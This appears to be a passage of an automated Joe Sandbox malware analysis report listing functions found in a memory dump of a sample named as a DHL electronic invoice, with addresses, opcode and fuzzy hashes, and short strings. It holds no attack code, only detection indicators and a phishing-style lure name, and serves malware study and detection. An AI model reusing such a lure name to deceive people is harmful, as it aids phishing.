Instruction Fuzzy Hash: 0241F330A44649CFEB25CF59C440F6DBBB8FF85701F144469E90ADB291E375D940CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0197A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 0197A5E4
Threadpool!, xrefs: 0197A5E9

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 8f3647ad7bd6792a933649f69b4bc780993c57d2745ba5aaa5b742dccc039385
Instruction ID: 680078c1118b86c2f4c37fda896333582503475cffd3559a155fdbc543995b88
Opcode Fuzzy Hash: 8f3647ad7bd6792a933649f69b4bc780993c57d2745ba5aaa5b742dccc039385
Instruction Fuzzy Hash: B901ADB2240704AFE312DF14CD46B1A77E8EB85715F058939A64CC7190E334D904CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0194C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0194C8C3, 0194CA40

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 01dc49b3391694af2e6c011cef3b29f66b0b394779495b8e42bc3192d9f644eb
Instruction ID: 67fdc52ee4f838634fcceaf404442a340fdc86313b403f8134b771cf3d965220
Opcode Fuzzy Hash: 01dc49b3391694af2e6c011cef3b29f66b0b394779495b8e42bc3192d9f644eb
Instruction Fuzzy Hash: C8826A79E012198FEB25CFA9C880FEDBBB5BF48710F14816AE95DAB391D7309941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 019C6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 019C65C1

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: d611c8aceaed75a64578372bc8901b7574e1b7b47d110fb3aae5f483a69cbf7a
Instruction ID: 75abaf251f20eb36666d90271c551ce8a40683d00998c1d5fe02faec6f71f22d
Opcode Fuzzy Hash: d611c8aceaed75a64578372bc8901b7574e1b7b47d110fb3aae5f483a69cbf7a
Instruction Fuzzy Hash: D8918471900219AFEB21DF95CD85FAEBBB8EF54B50F100059F609BB291D774AD00CB61

Uniqueness

Uniqueness Score: -1.00%

Function 019EE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 019EE1FA

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: d7e09d08a35b523bb6621a01cca6c65cb7eef2043fef34c87154337291c9d085
Instruction ID: fcb7212772e7c38742724ad6eae1de7bac44871b43239b970c0ae98d70819a2a
Opcode Fuzzy Hash: d7e09d08a35b523bb6621a01cca6c65cb7eef2043fef34c87154337291c9d085
Instruction Fuzzy Hash: 85917E3190064ABADB23EFA5DC48FAFBBB9EF85740F140029F509A7250EB759905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0197A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 019B67C9

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 8466b1f8c94f5da85aea04f69c640bd0a30f6e9707b20760bd698f502db40bcb
Instruction ID: de37f496e2b533ad34983d80104e5cf5b73a3cc631d1fce36db3482d960ddc18
Opcode Fuzzy Hash: 8466b1f8c94f5da85aea04f69c640bd0a30f6e9707b20760bd698f502db40bcb
Instruction Fuzzy Hash: 21715DB5E0021A9BDF28CF99C6D0AEDBBB5BF88711F14812EE509A7241E731A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 019E4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 019E4A7F

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 44c10c1df654e9657501e164317d8493bc028db44cf4922b9d5ed02e9b610df4
Instruction ID: cc564d65daf1dc9d2f098b5fad0ca9c5b0689538ca7f6956d112df7bc5d5a841
Opcode Fuzzy Hash: 44c10c1df654e9657501e164317d8493bc028db44cf4922b9d5ed02e9b610df4
Instruction Fuzzy Hash: A4519472D0022A9BDF12DF99D848EAEBBF9BF44A50F054169E919FB300D7349901CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 0195E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0195E6A4

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 10359001051677edb123ebf12d98270f5498745f5ef4ffeed297772940cf7658
Instruction ID: c055e51af1b13b50793cc57f46c8f636de094e38ebb8192fea92d0a8f8f1fb94
Opcode Fuzzy Hash: 10359001051677edb123ebf12d98270f5498745f5ef4ffeed297772940cf7658
Instruction Fuzzy Hash: 55417F72508306ABD751DA75C880B6BFBECAFC8714F44092DBE8CE7140E675DA04C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 019BC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 019BC77F

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 8737962c1a74e0ea7285355010c4758a29c71cde96f7548e758458a674fbd968
Instruction ID: 52f8611b1648367e1d1c3de1b2901df017e1bda246ecfc5286e2bcacfedfb705
Opcode Fuzzy Hash: 8737962c1a74e0ea7285355010c4758a29c71cde96f7548e758458a674fbd968
Instruction Fuzzy Hash: 634151B1D0022DABDB21DB60CD84FDEB77CAB85714F0045A5EA0CAB140DB709E89CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 019D6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 019D6B91

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: dbe1d1cfddeda6bd96da4347615b69ecd08398cfe397d33d929debf84839edf7
Instruction ID: 7f4e40793478cbb4da1cd320ea9b6341bc849921ceb2e172ae4ae32843e63843
Opcode Fuzzy Hash: dbe1d1cfddeda6bd96da4347615b69ecd08398cfe397d33d929debf84839edf7
Instruction Fuzzy Hash: 76310731E007599BEB22DF79C854BEE7BBCDF54704F148028EA49AB282D775E805CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019BCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 019BCAA2

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 6ff8c96a25dce915a51e852c340d031af4c543e3bb7f6b2ff18026b1cac9bb90
Instruction ID: 89a24bfe560b24eea03481ca348022d53945d0e34117a11b5217cc11beda29c7
Opcode Fuzzy Hash: 6ff8c96a25dce915a51e852c340d031af4c543e3bb7f6b2ff18026b1cac9bb90
Instruction Fuzzy Hash: 58310B36900529BFEB15DB59C995EBFBB74EF80750F114129E909AB250D730EE04D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 019C892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 019C895E

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: a6143daa9037824fb00545337c2c0be19444163ac662a3ac063e105b10e6c610
Instruction ID: e7944604a3352d37c1368974327f613640b1033d217c0b46dfd6afc2e270399c
Opcode Fuzzy Hash: a6143daa9037824fb00545337c2c0be19444163ac662a3ac063e105b10e6c610
Instruction Fuzzy Hash: 8F01F736600211ABE6209B999C85FD67B69FFC1F55F04041CF6CE16151CB30A841C797

Uniqueness

Uniqueness Score: -1.00%

Function 019E2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e780f239e8c71864695559cd0bbcc45dfd32252a93c409cf3f184eabf967354a
Instruction ID: a1c7ffe2dfcfba477e07b0caa01e122de6f46ff68091b6b601257b5f34c78513
Opcode Fuzzy Hash: e780f239e8c71864695559cd0bbcc45dfd32252a93c409cf3f184eabf967354a
Instruction Fuzzy Hash: F842C4716083419BE726CF68C894A6FBBEDBFC8740F08092DFA8A97250D771D945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 019D8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9e847adeed4f1aae8be9072c12012ff97c580dbc55fee2f314213df18e2c19e
Instruction ID: fe9d44f49ff56bc59288bb77c7159e1a1e3bd6725b49a1ced93e16aecff1b50b
Opcode Fuzzy Hash: c9e847adeed4f1aae8be9072c12012ff97c580dbc55fee2f314213df18e2c19e
Instruction Fuzzy Hash: 26426C75E002199FEB25CF69C841BADBBF9BF88311F15C099E94CAB242D7349985CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01952840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9967f26b15d5629f8c89b6b6a129d01affe66f3cdf69febacbfb988c8f5cdc5
Instruction ID: cfda5ae65dcf6d6d187767f2c2dc464f1ef0f64df09109ee0d2971f4e775467e
Opcode Fuzzy Hash: e9967f26b15d5629f8c89b6b6a129d01affe66f3cdf69febacbfb988c8f5cdc5
Instruction Fuzzy Hash: 5E320F70A007458FEB25CF69C854BBEBBFABF84704F58451DD58E9B284D735A80ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 019EA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be694063cc049cbcec77641937ccd3bf31e261acafbaecee39edbb28327cf7f
Instruction ID: 57ae6b6e5edae3c01e1275b86a30a9455e025a7e2d2ce759261875deb06dabb4
Opcode Fuzzy Hash: 2be694063cc049cbcec77641937ccd3bf31e261acafbaecee39edbb28327cf7f
Instruction Fuzzy Hash: F722F4746046618FEB26CF2DC098776BBF5BF45701F088859E98E8F2A6E735D442CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01968DBF Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f7a260168c6c4d6a541f158d18ce0d649ea7b1394e35784504d3122326aa03
Instruction ID: 290d522bb44241b361f0113b9eac950dd98a6586c9b875492bf3bd3962a396cf
Opcode Fuzzy Hash: 99f7a260168c6c4d6a541f158d18ce0d649ea7b1394e35784504d3122326aa03
Instruction Fuzzy Hash: ED225F70E0021ADBCF15CF99C4809BEFBFABF88715B54845AE9499B641E734ED41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01946A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dfae7215a06350b05984504a7a9945a3ae0c6786f36f4dd603e08ff6ee10701
Instruction ID: 1e85c6699058995a8f7fd272d40c2abba240b7a372e3f36ac99da54bd69b612b
Opcode Fuzzy Hash: 3dfae7215a06350b05984504a7a9945a3ae0c6786f36f4dd603e08ff6ee10701
Instruction Fuzzy Hash: 5832AFB1A04605CFDB25CF68C880FAABBF5FF49301F148969E959AB351D734E845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01964A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 595ce7ee7d12423a0485f9ed7113efa8d81932311647a1d0f65bcf704d227a94
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 70F17171E0021A9BDB15CFE9C590BAEBBFDBF48714F058129E909AB344D774E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019D892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564947956cf769c83eb25f494805f5f2be397b56b71cdbf018cc65ceeb4d7a10
Instruction ID: e647de04a17dc4520849babe3de0bbd29691871cf6e364c5955c4170b8810767
Opcode Fuzzy Hash: 564947956cf769c83eb25f494805f5f2be397b56b71cdbf018cc65ceeb4d7a10
Instruction Fuzzy Hash: E3D10171E0060A9BDF05CFA9C841BFEB7F5AF88304F18C569D959A7282D739E905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 019465D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd359475b996b2a7437e90d028d774ad9587a2e626928481ce97bccad9fe5c4d
Instruction ID: 4358bff50db001bce2efa8e541fcd104c44426b6b46614b5bfd4c1862399cad5
Opcode Fuzzy Hash: dd359475b996b2a7437e90d028d774ad9587a2e626928481ce97bccad9fe5c4d
Instruction Fuzzy Hash: 99E180B5508342CFC715CF28C490E6ABBE4FF8A314F058A6DE99997351E731E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01938397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b573f9cbf45a0706ea6d876337b34945fe7ebd1d04f62c8497d8a2f3d0d164
Instruction ID: 555d475535a76c378973ad75d59689be8f9a4a1f4fc4372273864ba3a0fbbfb6
Opcode Fuzzy Hash: 21b573f9cbf45a0706ea6d876337b34945fe7ebd1d04f62c8497d8a2f3d0d164
Instruction Fuzzy Hash: 27D1CF71A0020A9BDF15DF68D880EBA77AABFD4714F04462DF91EDB280E734E951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019C8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 2e828ba19048224094df60e63efb4c9f180ac0fcc4ca02e76e3981af6420e96f
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: A4B1C874A00605AFEF24DF58C944EAFBBBAFF84744F10445EAA8A97790DB34E905CB11

Uniqueness

Uniqueness Score: -1.00%

Function 01950535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 7ef28e772b8ed3b026bfada8b9858ecd2fea0133130b8b87026507ce7d6e2935
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 6CB10731700646AFDB15DB68C850BBEBBFAAF84304F180569EA5EA7281D770ED45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019483C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f448ee58883faccb3d7525465a29df4e36f3553d0d7a3e861f8a7cd347ae8d15
Instruction ID: 3a0f0f52b244e047edf551d41f291ac04884ebba6ebb72bf4765c4910ddb7bb2
Opcode Fuzzy Hash: f448ee58883faccb3d7525465a29df4e36f3553d0d7a3e861f8a7cd347ae8d15
Instruction Fuzzy Hash: 12C16774608381CFE764CF59C484BABB7E9BF88704F44496DE98987291E774E908CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0193C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 413e208e21bbfe81c5e4de4b6f68ea5c93e9a52c74bf3dc974c088afbda2b320
Instruction ID: 23a6e7f1b75d35815d037ec8fe1c5bf5430d91e970a9c9c46ef0d2b76554396c
Opcode Fuzzy Hash: 413e208e21bbfe81c5e4de4b6f68ea5c93e9a52c74bf3dc974c088afbda2b320
Instruction Fuzzy Hash: 1DB17170A046668BDB25DF68C890BA9B3F5EF84704F0485EAD50EE7281EB70DD85CB21

Uniqueness

Uniqueness Score: -1.00%

Function 0196E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6da79ae8247abb81b9c5cf080ddd9ed49a167e1b0ae12f7957761c047c2f2959
Instruction ID: bbbd53c85839d1247372da4ea39e429f2d61d20f14fc9bbf3d6ce5ed7ba93a80
Opcode Fuzzy Hash: 6da79ae8247abb81b9c5cf080ddd9ed49a167e1b0ae12f7957761c047c2f2959
Instruction Fuzzy Hash: 12A12735E006199FEB21DB9CC848FAEBBBCBF40754F050125EA09AB291D7789D45CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01980185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e32db24280bc9d1bd00855304a842cce158e9681490d990d26e57cde6b84f21c
Instruction ID: e319de9442ec2f022fab34e62c9fc29f6eadd13222b4da0ab65fb31639fc2106
Opcode Fuzzy Hash: e32db24280bc9d1bd00855304a842cce158e9681490d990d26e57cde6b84f21c
Instruction Fuzzy Hash: 78A1D270B00716DFDB25EF69C990BAAB7B9FF54715F084029EA0D97281EB34E816CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A14500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71fb6cf8cadef470bafb4576b804da9af51933c32850407ff77d108e8bfa927f
Instruction ID: bca36982fef5463aa00a8b683cb170b33823143aa97971f568a7ca5177ba1ba9
Opcode Fuzzy Hash: 71fb6cf8cadef470bafb4576b804da9af51933c32850407ff77d108e8bfa927f
Instruction Fuzzy Hash: D5A1DE72A14652EFD712DF2CC980B2ABBE9FF88744F050928F9899B655D334ED01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019C60E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f64a1b59919a983171c6d9d3b4962ead0877d99b7d45b6915340b85d1033145
Instruction ID: 9fb549a0213635cee245802cf1959e3543abc4d232b5f69c0fedbd06679db5f5
Opcode Fuzzy Hash: 5f64a1b59919a983171c6d9d3b4962ead0877d99b7d45b6915340b85d1033145
Instruction Fuzzy Hash: B791D671D0021AAFDB15CFA8D884BBEBFB9AF48B11F15416DE658EB341D734D9008BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0195E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d199fdb217c0bbc9f413d5c327df05c12561be53e30b9e97c1d4a246fc3962d3
Instruction ID: c9204c1ac7e056b21ff72cb0f6d37d15a39cef2406db6d6c74184ebde859a62a
Opcode Fuzzy Hash: d199fdb217c0bbc9f413d5c327df05c12561be53e30b9e97c1d4a246fc3962d3
Instruction Fuzzy Hash: 12914631A00616DBEB65DF6CC440B7ABBA6FF84B19F054465ED0DAB340E735DA02C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01996ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1aa196a779eb2c3e32b16a04c1b5b7041f1eab94ef825eb5415173c2953e8ad
Instruction ID: e3a7f59da770b0622981cbd0c9690ae1740eb2f97afed7c2d8d203d6ebd9776c
Opcode Fuzzy Hash: e1aa196a779eb2c3e32b16a04c1b5b7041f1eab94ef825eb5415173c2953e8ad
Instruction Fuzzy Hash: 7F81B171E006169BDB15CF6DC840ABEBBF9FB48700F04842EE959E7640E334E941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01A0AB40 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction ID: 7620e2ee9b3f3d94636e8282318c45a86f7ff18dfd5efdcedc8711dc885a2394
Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
Instruction Fuzzy Hash: B4818031A107099FDF1ACF99D890ABEBBB2FF84310F198569D9169B384DB34E905CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0197E284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1532555059.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1910000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 963887eda28c8214f9b20ab12fe1017786efea89d7b7754affa26eab207647ce
Instruction ID: 0ffb6e2e80097506f4955778615258093f5c8c0ccf0a102b7a6976b21fd3dc13
Opcode Fuzzy Hash: 963887eda28c8214f9b20ab12fe1017786efea89d7b7754affa26eab207647ce
Instruction Fuzzy Hash: 33813D71A00609AFDB25DFA9C980BEEBBFAFF88354F144429E559A7250D730AC45CB60

Uniqueness

Uniqueness Score: -1.00%

